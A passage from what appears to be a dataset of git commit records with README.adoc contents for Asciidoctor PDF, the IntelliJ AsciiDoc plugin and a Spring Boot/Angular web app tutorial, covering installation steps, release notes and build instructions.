highlighting with CodeRay or Pygments\n* Page numbering\n* Customizable running content (header and footer)\n* \u201cKeep together\u201d blocks (i.e., page breaks avoided in certain block 
content)\n* Orphan section titles avoided\n* Table border settings honored\n* Font-based icons\n* Custom fonts\n\n=== Missing features\n\nSee <<WORKLOG.adoc#,WORKLOG>>.\n\n== Prerequisites\n\nAll that's needed is Ruby (1.9.3 or above; 2.2.x recommended) and a few Ruby gems, which we explain how to install in the next section.\n\n[WARNING]\n====\nPrawn 2.0.0 and above requires Ruby >= 2.0.0 at installation (though it still works with Ruby 1.9.3 once you get beyond installation).\nIf you need to use Asciidoctor PDF with Ruby 1.9.3, you must first install Prawn 1.3.0 using:\n\n $ gem install prawn --version 1.3.0\n\nYou can then proceed with installation of Asciidoctor PDF.\n====\n\nTo check you have Ruby available, use the `ruby` command to query the version installed:\n\n $ ruby --version\n\n== Getting started\n\nYou can get {project-name} by <<install-the-published-gem,installing the published gem>> or <<development,running the code from source>>.\n\n=== Install the published gem\n\n{project-name} is published in pre-release on RubyGems.org.\nYou can install the published gem using the following command:\n\n $ gem install --pre asciidoctor-pdf\n \nIf you want to syntax highlight source listings, you'll also want to install CodeRay, Rouge or Pygments.\nChoose one (or more) of the following:\n\n.CodeRay\n $ gem install coderay\n\n.Rouge\n $ gem install rouge\n\n.Pygments\n $ gem install pygments.rb\n \nYou then activate syntax highlighting for a given document by adding the following attribute to the document header (CodeRay shown):\n\n[source,asciidoc]\n----\n:source-highlighter: coderay \n----\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script:\n\n $ asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}.\n\nLet's grab an AsciiDoc document to distill and start putting {project-name} to use!\n\n=== An example AsciiDoc document\n\nIf you don't already have an AsciiDoc document, you can use the [file]_basic-example.adoc_ file found in the examples directory of this project.\n\nifeval::[{safe-mode-level} >= 20]\nSee <<examples\/basic-example.adoc#,basic-example.adoc>>.\nendif::[]\nifeval::[{safe-mode-level} < 20]\n.basic-example.adoc\n[source,asciidoc]\n....\ninclude::examples\/basic-example.adoc[]\n....\nendif::[]\n\nIt's time to convert the AsciiDoc document directly to PDF.\n\n=== Convert AsciiDoc to PDF\n\nIMPORTANT: You'll need the `coderay` gem installed to run this example since it uses the `source-highlighter` attribute with the value of `coderay`.\n\nConverting to PDF is a simple as running the `asciidoctor-pdf` script using Ruby and passing our AsciiDoc document as the first argument.\n\n $ asciidoctor-pdf basic-example.adoc\n\nThis command is just a shorthand way of running:\n\n $ asciidoctor -r asciidoctor-pdf -b pdf basic-example.adoc\n\nWhen the script completes, you should see the file [file]_basic-example.pdf_ in the same directory.\nOpen the [file]_basic-example.pdf_ file with a PDF viewer to see the result.\n\n.Example PDF document rendered in a PDF viewer\nimage::examples\/example-pdf-screenshot.png[Screenshot of PDF document,width=800,scaledwidth=100%]\n\nYou're also encouraged to try converting this <<README#,README>> as well as the documents in the examples directory to see more of what {project-name} can do.\n\nThe pain of the DocBook toolchain should be melting away about now.\n\n== Themes\n\nThe layout and styling of the PDF is driven by a YAML configuration file.\nTo 
learn how the theming system works and how to create and apply custom themes, refer to the <<docs\/theming-guide.adoc#,Asciidoctor PDF Theme Guide>>.\nYou can use the built-in theme files, which you can find in the [file]_data\/themes_ directory, as examples.\n\n== Font-based Icons\n\nYou can use icons in your PDF document using any of the following icon sets:\n\n* *fa* - https:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome^] (default)\n* *octicon* - https:\/\/octicons.github.com\/[Octicons^]\n* *fi* - http:\/\/zurb.com\/playground\/foundation-icon-fonts-3[Foundation Icons^]\n* *pf* - http:\/\/paymentfont.io\/[Payment font^]\n\nYou can enable font-based icons by setting the following attribute in the header of your document:\n\n[source,asciidoc]\n----\n:icons: font\n----\n\nIf you want to override the font set globally, also set the `icon-set` attribute:\n\n[source,asciidoc]\n----\n:icons: font\n:icon-set: pf\n----\n\nHere's an example that shows how to use the Amazon icon from the payment font (pf) icon set in a sentence:\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[].\n----\n\nYou can use the `set` attribute on the icon macro to override the icon set for a given icon.\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[set=pf].\n----\n\nIn addition to the sizes supported in the HTML backend (lg, 1x, 2x, etc), you can enter any relative value in the size attribute (e.g., 1.5em, 150%, etc).\n\n[source,asciidoc]\n----\nicon:android[size=40em]\n----\n\nYou can enable use of fonts during PDF generation (instead of in the document header) by passing the `icons` attribute to the `asciidoctor-pdf` command.\n\n $ asciidoctor-pdf -a icons=font -a icon-set=octicon sample.adoc\n\nIcon-based fonts are handled by the `prawn-icon` gem.\nTo find a complete list of available icons, consult the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon] repository.\n\n== Optional scripts\n\n{project-name} also provides a shell script that invokes GhostScript (`gs`) to optimize and compress the generated PDF with minimal impact on quality.\nYou must have Ghostscript installed to use it.\n\nHere's an example usage:\n\n $ .\/bin\/optimize-pdf basic-example.pdf\n\nThe command will generate the file [file]_example-optimized.pdf_ in the current directory.\n\nWARNING: The `optimize-pdf` script currently requires a Bash shell (Linux, OSX, etc).\nWe plan to rewrite the script in Ruby so it works across platforms (see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/1[issue #1])\n\nIMPORTANT: The `optimize-pdf` script relies on Ghostscript >= 9.10.\nOtherwise, it may actually make the PDF larger.\nAlso, you should only consider using it if the file size of the original PDF is > 5MB.\n\nIf a file is found with the extension `.pdfmarks` and the same rootname as the input file, it is used to add metadata to the generated PDF document.\nThis file is necessary to preserve the document metadata since Ghostscript will otherwise drop it.\nThat's why {project-name} always creates this file in addition to the PDF.\n\n== Contributing\n\nIn the spirit of free software, _everyone_ is encouraged to help improve this project.\n\nTo contribute code, simply fork the project on GitHub, hack away and send a pull request with your proposed changes.\n\nFeel free to use the {uri-project-issues}[issue tracker] or {uri-project-list}[Asciidoctor mailing list] to provide feedback or suggestions in other ways.\n\n== Development\n\nTo help develop {project-name}, or to simply use the 
development version, you need to get the source from GitHub.\nFollow the instructions below to learn how to clone the source and run it from your local copy.\n\n=== Retrieve the source code\n\nYou can retrieve the source of {project-name} in one of two ways:\n\n. Clone the git repository\n. Download a zip archive of the repository\n\n==== Option 1: Fetch using git clone\n\nIf you want to clone the git repository, simply copy the {uri-project-repo}[GitHub repository URL] and pass it to `git clone` command:\n\n $ git clone https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n\nNext, change to the project directory:\n\n $ cd asciidoctor-pdf\n\n==== Option 2: Download the archive\n\nIf you want to download a zip archive, click the btn:[Download Zip] button on the right-hand side of the repository page on GitHub.\nOnce the download finishes, extract the archive, open a console and change to that directory.\n\nTIP: Instead of working out of the {project-handle} directory, you can simply add the absolute path of the [path]_bin_ directory to your `PATH` environment variable.\n\nWe'll leverage the project configuration to install the necessary dependencies.\n\n=== Install dependencies\n\nIf you're using {uri-rvm}[RVM], we recommend creating a new gemset to work with {project-name}:\n\n $ rvm use 2.2@asciidoctor-pdf --create\n\nWe like RVM because it keeps the dependencies required by various projects isolated.\n\nThe dependencies needed to use {project-name} are defined in the [file]_Gemfile_ at the root of the project.\nWe can use Bundler to install the dependencies for us.\n\nTo check you have Bundler available, use the `bundle` command to query the version installed:\n\n $ bundle --version\n\nIf it's not installed, use the `gem` command to install it.\n\n $ gem install bundler\n\nThen use the `bundle` command to install the project dependencies:\n\n $ bundle\n\nNOTE: You need to call `bundle` from the project directory so that it can find the [file]_Gemfile_.\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script using Ruby:\n\n $ ruby .\/bin\/asciidoctor-pdf -v\n\nor\n\n $ bundle exec .\/bin\/asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}!\n\nCAUTION: If you get an error message--and you're not using a Ruby manager like RVM--you may need to invoke the script through `bundle exec`:\nFor best results, be sure to always use `bundle exec` whenever invoking the `.\/bin\/asciidoctor-pdf` script in development mode.\n\n[[resources,Links]]\n== Resources\n\n* https:\/\/groups.google.com\/forum\/#!msg\/prawn-ruby\/MbMsCx862iY\/6ImCsvLGfVcJ[Discussion about image quality in PDFs]\n\n== Authors\n\n{project-name} was written by https:\/\/github.com\/mojavelinux[Dan Allen] and https:\/\/github.com\/graphitefriction[Sarah White] of OpenDevise Inc. on behalf of the Asciidoctor Project.\n\n== Copyright\n\nCopyright (C) 2014-2015 OpenDevise Inc. 
and the Asciidoctor Project.\nFree use of this software is granted under the terms of the MIT License.\n\nFor the full text of the license, see the <<LICENSE.adoc#,LICENSE>> file.\nRefer to the <<NOTICE.adoc#,NOTICE>> file for information about third-party Open Source software in use.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"bb235a7215d5806d96659db0948703e2b47e3bbd","subject":"make heading bold","message":"make heading bold\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= IntelliJ AsciiDoc Plugin\nErik Pragt\n:experimental:\n\nA plugin for the IntelliJ platform (IntelliJ IDEA, RubyMine, etc) that provides support for the http:\/\/www.asciidoc.org[AsciiDoc] markup language. You can install the plugin (named \"AsciiDoc\") from the plugins section inside your Jetbrains IDE or download it from the https:\/\/plugins.jetbrains.com\/plugin\/7391[Jetbrains Plugin Repository].\n\nimage::https:\/\/hacktoberfest.digitalocean.com\/assets\/logo-hacktoberfest-658b5aa2bd34e782d29c40bf6afbdff00f20fe1328efa6da17743878ba8db66f.png[float=left,width=200]\n\n*This plugin joined https:\/\/hacktoberfest.digitalocean.com\/[Hacktoberfest]!\nIssues that can give you a start are https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin\/issues?q=is%3Aissue+is%3Aopen+label%3AHacktoberfest[marked with the label \"Hacktoberfest\"], but you can choose any ticket you want to participate (and even create pull requests without a prior ticket).\nIf you want to discuss ideas and create pull requests you can meet Alexander, one of the maintainers, at the https:\/\/www.eventbrite.com\/e\/hacktoberfest-frankfurt-2018-tickets-50225231018[Frankfurt\/Main Hacktober Fest in Germany on October 12th].*\n\nIf you want to use the JavaFX instead of the Swing preview, you'll need to run IntelliJ with 64bit Java.\nFrom 2017.1 onwards 64bit Java is included even in the Windows versions.\nPlease only use the JDK provided by JetBrains, as the JavaFX rendering seems to be most stable in the JetBrains JDK.\n\n== Release notes\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- 
JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal JetBrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now built using https:\/\/gradle.org\/[Gradle] and the https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin].\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. 
More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 (preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to reduce memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the system's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n=== 0.14.3\n\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- disable automatically refreshing images on JavaFX (to be re-enabled in 0.15.x)\n\n=== 0.14.2\n\n- Performance improvement: render preview only when visible\n- Don't show AsciiDoc preview actions in other Editors\n- additional compatibility fixes for IntelliJ 15.x\n\n=== 0.14.1\n\n- make compatible with IntelliJ 15.x again. +\n This should include: AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11\n\n=== 0.14\n\n- New JavaFX preview and real split view\n- Update to asciidoctorj 1.5.4.1 and asciidoctorj-diagram 1.5.0\n\n=== 0.13\n\n- Updated to asciidoctorj 1.5.3.2, added support for asciidoctor-diagram\n\n=== 0.12\n\n- Bugfixes, new makelink action, table generation improvement, etc.\n\n=== 0.11\n\n- Removed AsciiDoc item in right click menu thanks to Dmitry Jemerov.\n- Added 'Open in Browser' menu item.\n- Added 40+ live templates (access them by pressing Cmd+J, or type 'ad-')\n\n== Features\n\n* Since 0.8: fixed incompatibility with non-IDEA IDEs, thanks to Harro Lissenberg\n* Since 0.7: Right click on a document to apply basic formatting or create tables.\n* Since 0.6: refactor Markdown to AsciiDoc. Right click on a file, or use the Refactor menu, and the Markdown document\nwill be replaced by the AsciiDoc equivalent. 
Also supports undo, in case you're not happy with the result!\n* Since 0.4: recognizes the AsciiDoc file extension (.adoc, .asciidoc, .ad)\n* Since 0.4: provides a two-pane AsciiDoc preview editor based on https:\/\/github.com\/asciidoctor\/asciidoctorj[AsciidoctorJ] with Live preview.\n\nIf you are missing features, please don't hesitate to let me know on Twitter: http:\/\/www.twitter.com\/epragt[@epragt] or make an issue in the issue tracker!\n\n== Dependencies\n\nThis project uses AsciiDoctorJ and JRuby for the rendering of the AsciiDoc content.\n\nFor the conversion of Markdown to AsciiDoc, we use Pegdown and the https:\/\/github.com\/bodiam\/markdown-to-asciidoc[Markdown to AsciiDoc] converter.\n\n== Build\n\nThis plugin is built using Gradle.\nIf you build or run it for the first time, it will download the community edition of IntelliJ automatically.\n\nIf you have developed the plugin before it changed to Gradle you might want to remove the contents of your `.idea` folder to trigger a re-import of the Gradle project.\n\nTo build this plugin, you need to run:\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 buildPlugin\n----\n\nThe ZIP file with the plugin to distribute will be located in `build\/distributions`.\n\nTo run the plugin for development, you'll need to run:\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 runIde\n----\n\n== Copyright and Licensing\n\nCopyright (C) 2013-2017 Julien Viet and Erik Pragt.\nReleased under the Apache License, Version 2.0 (see link:LICENSE[LICENSE]).\n\n== Credits\n\nThis plugin is based on the https:\/\/github.com\/nicoulaj\/idea-markdown[Intellij Markdown plugin by Julien Nicoulaud].\n\nAlso, great help was received from Harro Lissenberg, Alexander Schwartz and Dan Allen. Thank you all for your support!\n","old_contents":"= IntelliJ AsciiDoc Plugin\nErik Pragt\n:experimental:\n\nA plugin for the IntelliJ platform (IntelliJ IDEA, RubyMine, etc) that provides support for the http:\/\/www.asciidoc.org[AsciiDoc] markup language. 
You can install the plugin (named \"AsciiDoc\") from the plugins section inside your Jetbrains IDE or download it from the https:\/\/plugins.jetbrains.com\/plugin\/7391[Jetbrains Plugin Repository].\n\nimage::https:\/\/hacktoberfest.digitalocean.com\/assets\/logo-hacktoberfest-658b5aa2bd34e782d29c40bf6afbdff00f20fe1328efa6da17743878ba8db66f.png[float=left,width=200]\n\nThis plugin joined https:\/\/hacktoberfest.digitalocean.com\/[Hacktoberfest]!\nIssues that can give you a start are https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin\/issues?q=is%3Aissue+is%3Aopen+label%3AHacktoberfest[marked with the label \"Hacktoberfest\"], but you can choose any ticket you want to participate (and even create pull requests without a prior ticket).\nIf you want to discuss ideas and create pull requests you can meet Alexander, one of the maintainers, at the https:\/\/www.eventbrite.com\/e\/hacktoberfest-frankfurt-2018-tickets-50225231018[Frankfurt\/Main Hacktober Fest in Germany on October 12th].\n\nIf you want to use the JavaFX instead of the Swing preview, you'll need to run IntelliJ with 64bit Java.\nFrom 2017.1 onwards 64bit Java is included even in the Windows versions.\nPlease only use the JDK provided by JetBrains, as the JavaFX rendering seems to be most stable in the JetBrains JDK.\n\n== Release notes\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal Jetbrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to 
IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now build using the https:\/\/gradle.org\/[Gradle] and https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin]\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends are need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 (preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to save memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the systems's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n=== 0.14.3\n\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- disable automatically refreshing images on JavaFX (to be re-enabled in 0.15.x)\n\n=== 0.14.2\n\n- Performance improvement: render preview only when visible\n- Don't show AsciiDoc preview actions in other Editors\n- additional compatibility fixes for IntelliJ 15.x\n\n=== 0.14.1\n\n- make compatible with IntelliJ 15.x again. 
+\n This should include: AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11\n\n=== 0.14\n\n- New JavaFX preview and real split view\n- Update to asciidoctorj 1.5.4.1 and asciidoctorj-diagram 1.5.0\n\n=== 0.13\n\n- Updated to asciidoctorj 1.5.3.2, added support for asciidoctor-diagram\n\n=== 0.12\n\n- Bugfixes, new makelink action, table generation improvement, etc.\n\n=== 0.11\n\n- Removed AsciiDoc item in right click menu thanks to Dmitry Jemerov.\n- Added 'Open in Browser' menu item.\n- Added 40+ live template (access them by pressing Cmd+J, or type 'ad-')\n\n== Features\n\n* Since 0.8 Fixed incompatibility with non-IDEA IDE's, thanks to Harro Lissenberg\n* Since 0.7: Right click on a document to apply basic formatting or create tables.\n* Since 0.6: refactor Markdown to AsciiDoc. Right click on a file, or use the Refactor menu, and the Markdown document\nwill be replaced by the AsciiDoc equivalent. Also supports undo, in case you're not happy with the result!\n* Since 0.4: recognizes the AsciiDoc file extension (.adoc, .asciidoc, .ad)\n* Since 0.4: provides a two-pane AsciiDoc preview editor based on https:\/\/github.com\/asciidoctor\/asciidoctorj[AsciidoctorJ] with Live preview.\n\nIf you are missing features, please don't hesitate to let me know on Twitter: http:\/\/www.twitter.com\/epragt[@epragt] or make an issue in the issue tracker!\n\n== Dependencies\n\nThis project uses AsciiDoctorJ and JRuby for the rendering of the AsciiDoc content.\n\nFor the conversion of Markdown to AsciiDoc, we use Pegdown and the https:\/\/github.com\/bodiam\/markdown-to-asciidoc[Markdown to AsciiDoc] converter.\n\n== Build\n\nThis plugin is built using Gradle.\nIf you build or run it the first time it will download the community edition of IntelliJ automatically.\n\nIf you have developed the plugin before it changed to Gradle you might want to remove the contents of your `.idea` folder to trigger a re-import of the Gradle project.\n\nTo build this plugin, you need to run:\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 buildPlugin\n----\n\nThe ZIP file with plugin to distribute will be located in `build\/distributions`.\n\nTo run the plugin for development you'll need to start\n\n----\n.\/gradlew -Dfile.encoding=UTF-8 runIde\n----\n\n== Copyright and Licensing\n\nCopyright (C) 2013-2017 Julien Viet and Erik Pragt.\nReleased under the Apache License, Version 2.0 (see link:LICENSE[LICENSE]).\n\n== Credits\n\nThis plugin is based on the https:\/\/github.com\/nicoulaj\/idea-markdown[Intellij Markdown plugin by Julien Nicoulaud].\n\nAlso, great help was received from Harro Lissenberg, Alexander Schwartz and Dan Allen. 
Thank you all for your support!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc1a087063215ce988c1de3a94745e597440e97d","subject":"updated readme","message":"updated readme\n","repos":"toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= WebApp Tutorial\n\nThis is tutorial material for building web apps with Spring Boot, Spring Data Rest, AngularJS and TypeScript.\n\n== Used Technologies\n\n* http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/jdk8-downloads-2133151.html[Java 8] for the REST services\n* https:\/\/www.typescriptlang.org\/[TypeScript] for the web client\n* http:\/\/stateless.co\/hal_specification.html[HAL] (Hypertext Application Language) for hypermedia\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot] (+ Data, REST, HATEOAS)\n* http:\/\/angular.io\/[Angular 2] for web client\n* http:\/\/junit.org\/[JUnit] for Java unit and integration testing\n* https:\/\/code.google.com\/p\/mockito\/[Mockito] for Mocking\n* http:\/\/www.gradle.org\/[Gradle] as build system\n* Node.js, npm, Bower, typings, webpack for the web client build\n\n== Requirements\n\n* Java 8 (JDK) installed\n\nYou don't need to install Node.js and all the JavaScript tooling,\nsince those tools are installed automatically by the Gradle build.\nBut it would be convenient to have those tools installed\nif you want to use them directly instead of using the Gradle wrapper tasks.\n\n* Optional\n** Node.js and npm installed\n** TypeScript installed (npm install -g typescript)\n** Bower installed (npm install -g bower)\n** Typings installed (npm install -g typings)\n\nIn the vagrant directory you find a Vagrantfile to create a (German) development environment.\n\n* Install Vagrant and VirtualBox\n* Invoke \"vagrant up\" in a terminal\n* Wait for 20 minutes letting Vagrant create the whole virtual machine\n* In the VM, log in as vagrant\/vagrant and then invoke: startx\n* The latest Ubuntu with a simple desktop will start up\n* You find this project at \/home\/vagrant\/webapp-tutorial\n* All Gradle and JavaScript dependencies are already in the VM\n* You find an IntelliJ IDEA trial under \/opt\n* Before starting IntelliJ you have to configure the Java 8 JDK\n* After starting IntelliJ you have to install the Lombok plugin manually.\n\n== Getting Started\n\nWhen you want to run the tutorial locally, prepare all the labs:\n\n* .\/gradlew prepareJs (installs all node modules, typings and other dependencies in all labs)\n* .\/gradlew clean build (builds all the tutorial labs (Java parts + JavaScript parts), runs all the Java tests)\n","old_contents":"= WebApp Tutorial\n\nThis is tutorial material for building web apps with Spring Boot, Spring Data Rest, AnguluarJS and TypeScript.\n\n== Used Technologies\n\n* Java 7 or 8\n* http:\/\/stateless.co\/hal_specification.html[HAL] (Hypertext Application Language)\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot] (+ Data, REST, HATEOAS)\n* http:\/\/www.typescriptlang.org\/[TypeScript] for web client\n* http:\/\/angularjs.org\/[AngularJS] for web client\n* http:\/\/junit.org\/[JUnit] for Java unit and integration testing\n* https:\/\/code.google.com\/p\/mockito\/[Mockito] for Mocking\n* http:\/\/www.gradle.org\/[Gradle] as build 